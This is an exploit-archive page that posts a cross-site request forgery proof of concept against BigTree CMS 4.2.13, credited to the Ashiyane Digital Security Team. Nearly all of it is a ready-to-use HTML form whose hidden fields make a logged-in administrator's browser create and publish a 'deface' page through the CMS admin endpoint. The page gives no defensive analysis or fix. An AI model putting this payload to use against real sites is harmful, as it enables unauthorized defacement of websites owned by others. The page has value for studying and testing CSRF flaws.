Home / os / winmobile

BigTree CMS 4.2.13 Cross Site Request Forgery

Posted on 27 October 2016

-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -# Exploit Title : bigtree cms CSRF Exploit -# Author : Ashiyane Digital Security Team -# Vendor Homepage: https://www.bigtreecms.org/ -# Software Link: -# https://www.bigtreecms.org/ajax/download-installer/?installer=53 -# Version : 4.2.13 -# Date: 26-10-2016 -# Tested On : Windows 7 / FireFox -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# <html> <head> <title>Add page CSRF Exploit</title> </head> <H2>Add page CSRF Exploi</H2> <body> <form action="http://localhost/admin/pages/create/" method="POST"> <input type="hidden" name="_bigtree_post_check" value="success" /> <input type="hidden" name="parent" value="0" /> <input type="hidden" name="nav_title" value="deface" /> <input type="hidden" name="title" value="deface page title" /> <input type="hidden" name="in_nav" value="on" /> <input type="hidden" name="template" value="content" /> <input type="hidden" name="resources[page_header]" value="page header" /> <input type="hidden" name="resources[page_content]" value="deface text" /> <input type="submit" name="ptype" value="Create & Publish" /> </form> </body> </html> -#-# Path of page: http://localhost/deface/ #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# #-# Discovered by : Amir.ght -#-# #-# Author : Ashiyane Digital Security Team -#-# #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

 

TOP

Malware :